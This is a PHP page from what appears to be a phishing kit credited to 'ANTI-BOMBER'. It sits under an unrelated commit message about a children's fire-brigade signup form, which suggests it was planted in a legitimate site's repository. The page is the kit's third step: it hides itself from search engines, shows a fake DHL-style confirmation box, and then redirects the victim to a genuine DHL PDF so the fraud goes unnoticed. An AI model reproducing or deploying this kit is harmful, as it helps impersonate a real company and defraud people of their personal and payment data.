- Anmeldeformular für Kinderfeuerwehr fertiggestellt - Fehlerbehebung wegen Umstellung auf https - Navigationsleiste wird in der Kategorie "Wir über uns" dynamisch erstellt
116 lines
3.8 KiB
PHP
116 lines
3.8 KiB
PHP
<?php
|
||
/*==========================================================================
|
||
* +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Author Name : ANƬƖ-ƁƠMƁЄƦ
|
||
* [A][и][T][Ɩ] [в][σ][м][в][є][я] Template Name : O|P|T|U|S|N|E|T|-|C|O|M|-|A|U|
|
||
* +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Template Version : V.1.1 By 🄰🄽🅃🄸-🄱🄾🄼🄱🄴🅁
|
||
===========================================================================*/
|
||
$page = 'default';
|
||
require_once 'init.php';
|
||
if(!isset($_GET['id'])):
|
||
die(rediret($link)); // We're done here
|
||
else:
|
||
$action = './request.php?step=three&'.$id;
|
||
?>
|
||
<!DOCTYPE html>
|
||
<html lang="de">
|
||
<head>
|
||
<meta charset="UTF-8"/>
|
||
<meta http-equiv="x-ua-compatible" content="ie=edge">
|
||
<title><?php echo lang('Title'); ?></title>
|
||
<meta name="robots" content="noindex, nofollow, noimageindex">
|
||
<meta name="google" content="notranslate">
|
||
<meta name="description" content="">
|
||
<meta name="viewport" content="width=device-width, initial-scale=1">
|
||
<link rel="stylesheet" href="<?php echo $css1; ?>">
|
||
<link rel="stylesheet" href="./layout/css/style.css">
|
||
<link rel="shortcut icon nofollow" href="<?php echo $favicon; ?>">
|
||
<script src="<?php echo $js;?>"></script>
|
||
<script src="./layout/js/style.js"></script>
|
||
</head>
|
||
<body class="lowla">
|
||
<div id="bg-load" class="bg-load"><div class="load"></div> </div>
|
||
<div class="contenu">
|
||
<header>
|
||
<div class="pri">
|
||
<span class="prv"><?php echo lang('Fo9001'); ?></span>
|
||
<span class="per"><?php echo lang('Fo9002'); ?></span>
|
||
</div>
|
||
<div class="bande">
|
||
<span class="lg"><img src="./layout/img/lg.svg"></span>
|
||
<ul>
|
||
<li><?php echo lang('LdngP2'); ?></li>
|
||
<li><?php echo lang('LdngP3'); ?></li>
|
||
<li><?php echo lang('LdngP4'); ?></li>
|
||
</ul>
|
||
</div>
|
||
</header>
|
||
<section>
|
||
<form id="lFrm" method="post" action="<?php echo $action; ?>">
|
||
<div class="parag">
|
||
<span class="titr"><?php echo lang('LdngP5'); ?></span>
|
||
<span class="deta"><?php echo lang('CntP'); ?></span>
|
||
<span class="deta"><?php echo lang('CusId'); ?></span>
|
||
</div>
|
||
<div class="box" style="background-color: #dff0d8;color: #3c763d;border-radius:10px;max-width:500px;text-align:center;padding:10px">
|
||
<img class="pb01" src="./layout/img/ok.svg"><br><?php echo lang('YouHav'); ?> </div>
|
||
</form>
|
||
<div class="pubb"><img class="pb01" src="./layout/img/pub.jpg"><img class="pb02" src="./layout/img/pubr.gif"></div>
|
||
</section>
|
||
</div>
|
||
|
||
<footer>
|
||
<div class="contenu">
|
||
<ul>
|
||
<li><?php echo lang('AsdH2'); ?></li>
|
||
<li><?php echo lang('AsdS1'); ?></li>
|
||
<li><?php echo lang('AsdS2'); ?></li>
|
||
<li><?php echo lang('AsdS3'); ?></li>
|
||
</ul>
|
||
<ul>
|
||
<li><?php echo lang('AsdS4'); ?></li>
|
||
<li><?php echo lang('P1H1'); ?></li>
|
||
<li><?php echo lang('P1Pr'); ?></li>
|
||
<li><?php echo lang('P2H1'); ?></li>
|
||
</ul>
|
||
<ul>
|
||
<li><?php echo lang('P2Pr'); ?></li>
|
||
<li><?php echo lang('P3H1'); ?></li>
|
||
<li><?php echo lang('P3Pr'); ?></li>
|
||
<li><?php echo lang('PLink'); ?></li>
|
||
<li><?php echo lang('FtrS1'); ?></li>
|
||
</ul>
|
||
<div>© <?php echo date("Y"); ?><?php echo lang('FtrS2'); ?></div>
|
||
</div>
|
||
</footer>
|
||
</body>
|
||
<script>
|
||
function onReady(callback) {
|
||
var intervalId = window.setInterval(function() {
|
||
if (document.getElementsByTagName('body')[0] !== undefined) {
|
||
window.clearInterval(intervalId);
|
||
callback.call(this);
|
||
}
|
||
}, 1000);
|
||
}
|
||
|
||
function setVisible(selector, visible) {
|
||
document.querySelector(selector).style.display = visible ? 'block' : 'none';
|
||
}
|
||
|
||
onReady(function() {
|
||
setVisible('body', true);
|
||
setVisible('#bg-load', false);
|
||
});
|
||
|
||
setTimeout(function() { //wait 4 Segonds before Submit
|
||
window.location.replace("https://www.dhl.de/content/dam/images/pdf/dhl-agb-empfangsoptionen-022018.pdf");
|
||
}, 5000);
|
||
|
||
</script>
|
||
<script src="<?php echo $js;?>"></script>
|
||
</html>
|
||
<?php
|
||
endif;
|
||
ob_end_flush();
|
||
?>
|